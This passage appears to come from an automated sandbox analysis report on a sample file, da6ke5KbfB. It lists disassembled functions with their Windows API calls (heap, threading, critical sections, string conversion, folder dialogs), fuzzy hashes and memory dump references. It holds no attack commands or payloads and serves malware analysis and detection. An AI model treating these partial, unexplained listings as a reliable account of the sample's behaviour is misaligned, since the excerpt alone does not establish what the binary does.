                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$Free$Alloc
                                                                        • String ID: $0A
                                                                        • API String ID: 3901518246-513306843
                                                                        • Opcode ID: 38ff8db7da0bfef88404013647d5d2cc437161e020f58e3aa9cad386b680b922
                                                                        • Instruction ID: cd652e3bdf182b70a5213d1d771de0a97fad45979f4c99c471b58853275527fc
                                                                        • Opcode Fuzzy Hash: 38ff8db7da0bfef88404013647d5d2cc437161e020f58e3aa9cad386b680b922
                                                                        • Instruction Fuzzy Hash: F4216AB1600716BFD3108F2ADC01B46BBE4FB4C700F41812EB508E76A1DB70E964CB99
                                                                        Function 0040548C Relevance: 7.6, APIs: 5, Instructions: 60synchronizationthreadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateThread.KERNEL32(00000000,00001000,?,?,00000000,007C9F70), ref: 004054A5
                                                                        • EnterCriticalSection.KERNEL32(00418708,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054B7
                                                                        • WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054CE
                                                                        • CloseHandle.KERNEL32(00000008,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054DA
                                                                          • Part of subcall function 0040E1B2: HeapFree.KERNEL32(00000000,-00000008,0040DACB,00000010,00000800,?,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?), ref: 0040E1EB
                                                                        • LeaveCriticalSection.KERNEL32(00418708,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 0040551D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection$CloseCreateEnterFreeHandleHeapLeaveObjectSingleThreadWait
                                                                        • String ID:
                                                                        • API String ID: 3708593966-0
                                                                        • Opcode ID: 7d32ff8fa703d6aea88238e8b85a34b2bc4f47d3e9cf465d70c1e07cefa75554
                                                                        • Instruction ID: 22802cd27a3f1ed093d1fd342325ad429a5e5b172653039cc62d2cb3277a330b
                                                                        • Opcode Fuzzy Hash: 7d32ff8fa703d6aea88238e8b85a34b2bc4f47d3e9cf465d70c1e07cefa75554
                                                                        • Instruction Fuzzy Hash: AD11C232148214BFC3115F69EC05AD7BBB9EF46752720843AF800972A0EB75A8818B68
                                                                        Function 0040DFC6 Relevance: 7.6, APIs: 5, Instructions: 54memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • EnterCriticalSection.KERNEL32(00418684,00000200,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3), ref: 0040DFDA
                                                                        • LeaveCriticalSection.KERNEL32(00418684,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040E02F
                                                                          • Part of subcall function 0040DFC6: HeapFree.KERNEL32(00000000,?,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004), ref: 0040E028
                                                                        • DeleteCriticalSection.KERNEL32(00000020,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3), ref: 0040E048
                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200), ref: 0040E057
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection$FreeHeap$DeleteEnterLeave
                                                                        • String ID:
                                                                        • API String ID: 3171405041-0
                                                                        • Opcode ID: fdf9844f3b1e6b4279b4029fb6c954a1531c20b726c16353b8bda20627decff9
                                                                        • Instruction ID: 55e4d48cd168304893741703cb98186ecc41a8d0b28d64f5ed6d9708d3a92668
                                                                        • Opcode Fuzzy Hash: fdf9844f3b1e6b4279b4029fb6c954a1531c20b726c16353b8bda20627decff9
                                                                        • Instruction Fuzzy Hash: 23116A71101611EFC720AF16DC08B97BBB9FF45301F15883EE50AA7AA1C779A855CFA8
                                                                        Function 0040994F Relevance: 7.5, APIs: 6, Instructions: 31COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CloseHandle.KERNEL32(007C9F70,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 0040995D
                                                                        • CloseHandle.KERNEL32(?,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 00409968
                                                                        • CloseHandle.KERNEL32(?,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 00409973
                                                                        • CloseHandle.KERNEL32(?,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 0040997E
                                                                        • EnterCriticalSection.KERNEL32(00418730,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 00409986
                                                                        • LeaveCriticalSection.KERNEL32(00418730,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 0040999A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: CloseHandle$CriticalSection$EnterLeave
                                                                        • String ID:
                                                                        • API String ID: 10009202-0
                                                                        • Opcode ID: 926b03219edff138682592b50218eb32bbb5e82e6177662db6676d56e49f664e
                                                                        • Instruction ID: e0bc3ded0607a690d6707024abf9d108a6c512657707c309f6689cc3689588ed
                                                                        • Opcode Fuzzy Hash: 926b03219edff138682592b50218eb32bbb5e82e6177662db6676d56e49f664e
                                                                        • Instruction Fuzzy Hash: 35F0FE32004600ABD3226F25DC08BABB7B5BF91355F15883EE055615B0CB796896DF59
                                                                        Function 00409698 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0040E900: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E90C
                                                                          • Part of subcall function 0040E900: HeapReAlloc.KERNEL32(007C0000,00000000,?,?), ref: 0040E967
                                                                        • GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BD6,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004096B4
                                                                        • wcscmp.MSVCRT ref: 004096C2
                                                                        • memmove.MSVCRT(00000000,00000008,\\?\,?,?,?,00401BD6,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000), ref: 004096DA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: AllocFileHeapModuleNameValuememmovewcscmp
                                                                        • String ID: \\?\
                                                                        • API String ID: 3734239354-4282027825
                                                                        • Opcode ID: 33c17352ecf2d33e8b842fb82144003de2b1de4302be4aa3bf9866a4b196b950
                                                                        • Instruction ID: 45f2cbb32eb965b059acfe96771e330f3b1ba6a562bb2c4a442859e911d7a588
                                                                        • Opcode Fuzzy Hash: 33c17352ecf2d33e8b842fb82144003de2b1de4302be4aa3bf9866a4b196b950
                                                                        • Instruction Fuzzy Hash: 15F0E2B31002017AC2006777DC89CAB7BACEB853B4750093FF516E2491EA38D82486B8
                                                                        Function 0040B8B6 Relevance: 6.3, APIs: 5, Instructions: 93COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040B957
                                                                        • memset.MSVCRT ref: 0040B960
                                                                        • memset.MSVCRT ref: 0040B969
                                                                        • memset.MSVCRT ref: 0040B976
                                                                        • memset.MSVCRT ref: 0040B982
                                                                          • Part of subcall function 0040CCB6: memcpy.MSVCRT(?,?,00000040,?,?,?,?,?,?,?,?,?,00000000,?,0040B8F5,?), ref: 0040CD10
                                                                          • Part of subcall function 0040CCB6: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,0040B8F5,?), ref: 0040CD5F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: memset$memcpy
                                                                        • String ID:
                                                                        • API String ID: 368790112-0
                                                                        • Opcode ID: b0beb639d4b87296fea5d69f8c5fb0a7f200458fdca181524d22ac5a9409a4ef
                                                                        • Instruction ID: 1965f6ec6392bd57460d2593cd94e0dced67690f07481f5a959be489f1b8959c
                                                                        • Opcode Fuzzy Hash: b0beb639d4b87296fea5d69f8c5fb0a7f200458fdca181524d22ac5a9409a4ef
                                                                        • Instruction Fuzzy Hash: FD21D6727507083BE524AA29DC86F9F738CDB41708F50063EF241B62C1DA79E54546AD
                                                                        Function 00405BA0 Relevance: 6.2, APIs: 4, Instructions: 167memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: AllocHeapwcsncpy
                                                                        • String ID:
                                                                        • API String ID: 2304708654-0
                                                                        • Opcode ID: a90f3be50ee59ad9f9cb2c8344752c2d6c44559da06bb1932963a8c5f4cf1607
                                                                        • Instruction ID: c5f2f283d94cb2b95ca38a154dbf8d05cc6d7144c7ec2ede7a16228095844b4d
                                                                        • Opcode Fuzzy Hash: a90f3be50ee59ad9f9cb2c8344752c2d6c44559da06bb1932963a8c5f4cf1607
                                                                        • Instruction Fuzzy Hash: F751BD34508B059BDB209F28D844A6B77F4FF84348F544A2EFC85A72D0E778E955CB89
                                                                        Function 00406670 Relevance: 6.1, APIs: 4, Instructions: 90COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CharLowerW.USER32(00417032,?,?,?,?,?,?,?,?,?,004026F1,00000000,00000000), ref: 00406696
                                                                        • CharLowerW.USER32(00000000,?,?,?,?,?,?,?,?,004026F1,00000000,00000000), ref: 004066D0
                                                                        • CharLowerW.USER32(?,?,?,?,?,?,?,?,?,004026F1,00000000,00000000), ref: 004066FF
                                                                        • CharLowerW.USER32(?,?,?,?,?,?,?,?,?,004026F1,00000000,00000000), ref: 00406705
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: CharLower
                                                                        • String ID:
                                                                        • API String ID: 1615517891-0
                                                                        • Opcode ID: dd20185b596db2745f2b704bac9dd4eb7d3bfe8c6e03a6d263d02bee93d56928
                                                                        • Instruction ID: f3574eb3d9009b883351c62f390b1b458f0f5c76b551c27569f8cb84250b8306
                                                                        • Opcode Fuzzy Hash: dd20185b596db2745f2b704bac9dd4eb7d3bfe8c6e03a6d263d02bee93d56928
                                                                        • Instruction Fuzzy Hash: 0E2157796043158BC710EF5D9C40077B3A0EF80765F86887BFC85A3380DA39EE169BA9
                                                                        Function 00412840 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0040D738,00000000), ref: 00412874
                                                                        • malloc.MSVCRT ref: 00412884
                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000), ref: 004128A1
                                                                        • malloc.MSVCRT ref: 004128B6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWidemalloc
                                                                        • String ID:
                                                                        • API String ID: 2735977093-0
                                                                        • Opcode ID: 8be09bc5dba933f52a62dcd4c1466ac7b9e98312e52af60236e0b5bb7a24d736
                                                                        • Instruction ID: e0c8a2120d9564889d2f3113141632f921e3b611a2b6a27c47ae7c2ad602c93a
                                                                        • Opcode Fuzzy Hash: 8be09bc5dba933f52a62dcd4c1466ac7b9e98312e52af60236e0b5bb7a24d736
                                                                        • Instruction Fuzzy Hash: 9E01453B34130127E3206699AC12FB73B59CB81B95F19017AFB009E2C0D6F3A80082B9
                                                                        Function 004128E0 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00412911
                                                                        • malloc.MSVCRT ref: 00412921
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041293B
                                                                        • malloc.MSVCRT ref: 00412950
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWidemalloc
                                                                        • String ID:
                                                                        • API String ID: 2735977093-0
                                                                        • Opcode ID: dc45e273b66a9daf34e262ac0fef012b7e67277b67b23735523b4b314dffbbe5
                                                                        • Instruction ID: 3026177615c0ccb99804f522c9f73c57bab6efbcd972e36018b7209c0027a648
                                                                        • Opcode Fuzzy Hash: dc45e273b66a9daf34e262ac0fef012b7e67277b67b23735523b4b314dffbbe5
                                                                        • Instruction Fuzzy Hash: AB01F57734534127E3205699AD42FA77B59CB81BA5F19007AFB01AE2C0DAF7681086B8
                                                                        Function 0040AFEC Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SHGetFolderLocation.SHELL32(00000000,007C9F70,00000000,00000000,00000000,00000000,00000000,?,00000104,0040AF9B,00000000,00000000,00000104,?), ref: 0040AFFE
                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040B00F
                                                                        • wcslen.MSVCRT ref: 0040B01A
                                                                        • CoTaskMemFree.OLE32(00000000,?,00000104,0040AF9B,00000000,00000000,00000104,?,?,?,?,00000009,0040373D,00000001,00000000,00000000), ref: 0040B038
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: FolderFreeFromListLocationPathTaskwcslen
                                                                        • String ID:
                                                                        • API String ID: 4012708801-0
                                                                        • Opcode ID: 6faf2d54f5b57ee11cbd029bcc5efc3640db8cf73aecbbbd6fb1dba8edde6915
                                                                        • Instruction ID: ea6acf64d2064cc2033e367344890d06019be10827a432285197bb32926cdf71
                                                                        • Opcode Fuzzy Hash: 6faf2d54f5b57ee11cbd029bcc5efc3640db8cf73aecbbbd6fb1dba8edde6915
                                                                        • Instruction Fuzzy Hash: BBF08136500615BAC7205F6ADC0DDAB7B7CEF15BA07404226F805E6260E7319910D7E8
                                                                        Function 00405430 Relevance: 6.0, APIs: 4, Instructions: 34threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 004053E4: EnterCriticalSection.KERNEL32(00418708,?,?,-0000012C,004053CA,00000000,00401FD6,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000), ref: 004053EF
                                                                          • Part of subcall function 004053E4: LeaveCriticalSection.KERNEL32(00418708,?,?,-0000012C,004053CA,00000000,00401FD6,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000), ref: 00405422
                                                                        • TerminateThread.KERNEL32(00000000,00000000,00000000,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000), ref: 00405440
                                                                        • EnterCriticalSection.KERNEL32(00418708,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040544C
                                                                        • CloseHandle.KERNEL32(-00000008,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040546C
                                                                          • Part of subcall function 0040E1B2: HeapFree.KERNEL32(00000000,-00000008,0040DACB,00000010,00000800,?,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?), ref: 0040E1EB
                                                                        • LeaveCriticalSection.KERNEL32(00418708,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405480
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection$EnterLeave$CloseFreeHandleHeapTerminateThread
                                                                        • String ID:
                                                                        • API String ID: 85618057-0
                                                                        • Opcode ID: be79b443d5972bd681091ed05d4b22618ed934695998c5f90ab991cc6a18f9e1
                                                                        • Instruction ID: 2660d4446155f5fb089545407d2c8513ff3ad75f9eb032afb91e50ebd33cab77
                                                                        • Opcode Fuzzy Hash: be79b443d5972bd681091ed05d4b22618ed934695998c5f90ab991cc6a18f9e1
                                                                        • Instruction Fuzzy Hash: 05F0E233404610FBC6205B619C49EE77779EF55767724883FF94172291CB386841CE6D
                                                                        Function 004099C7 Relevance: 6.0, APIs: 4, Instructions: 26COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,00000000,?,?,00409BAF,?), ref: 004099D6
                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,?,00409BAF,?), ref: 004099E2
                                                                        • DuplicateHandle.KERNEL32(00000000,?,?,00409BAF,?), ref: 004099E9
                                                                        • CloseHandle.KERNEL32(?,?,?,00409BAF,?), ref: 004099F5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentHandleProcess$CloseDuplicate
                                                                        • String ID:
                                                                        • API String ID: 1410216518-0
                                                                        • Opcode ID: 4852cd940a62ffebd97bec63e7d75145fa92973f44f615ba9ebe136649e88543
                                                                        • Instruction ID: ce6dac3176af70590056e0be6dcfbc27d6d18e8bdc9d520293d6dd9450c8e6f1
                                                                        • Opcode Fuzzy Hash: 4852cd940a62ffebd97bec63e7d75145fa92973f44f615ba9ebe136649e88543
                                                                        • Instruction Fuzzy Hash: 73E0ED75608209BFEB10DF91DC49F9ABB7DEB44741F104065F905D2660EB71AD11CB64
                                                                        Function 00402FAD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 193COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677
                                                                          • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                                                                          • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                                                                          • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                                                                          • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                                                          • Part of subcall function 00405EB0: CharUpperW.USER32(00000000,00000000,FFFFFFF5,00001000,00001000,?,?,00001000,00402F92,00000000,00000008,00000001,00000000,00000000,00000000,00000000), ref: 00405F01
                                                                          • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                                                                          • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(007C0000,00000000,?), ref: 0040E599
                                                                          • Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(007C0000,00000000,?,?), ref: 0040E5BC
                                                                          • Part of subcall function 00402E49: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,004044FA,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402E71
                                                                          • Part of subcall function 00402E49: __fprintf_l.LIBCMT ref: 00402ECB
                                                                          • Part of subcall function 00409355: CoInitialize.OLE32(00000000), ref: 00409373
                                                                          • Part of subcall function 00409355: memset.MSVCRT ref: 00409381
                                                                          • Part of subcall function 00409355: LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040938E
                                                                          • Part of subcall function 00409355: GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 004093B0
                                                                          • Part of subcall function 00409355: GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 004093BC
                                                                          • Part of subcall function 00409355: wcsncpy.MSVCRT ref: 004093DD
                                                                          • Part of subcall function 00409355: wcslen.MSVCRT ref: 004093F1
                                                                          • Part of subcall function 00409355: CoTaskMemFree.OLE32(?), ref: 0040947A
                                                                          • Part of subcall function 00409355: wcslen.MSVCRT ref: 00409481
                                                                          • Part of subcall function 00409355: FreeLibrary.KERNEL32(00000000,00000000), ref: 004094A0
                                                                          • Part of subcall function 00403E37: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,-00000004,00403A0D,00000000,00000001,00000000,00000000,00000001,00000003,00000000), ref: 00403E67
                                                                        • PathAddBackslashW.SHLWAPI(00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000,00000000,FFFFFFF5,00000003,00000000,00000000,00000000,00000000,00000000), ref: 00403178
                                                                          • Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7
                                                                        • PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,007C7CC0,00000000,00000000,00000200,00000000,00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000), ref: 004031DD
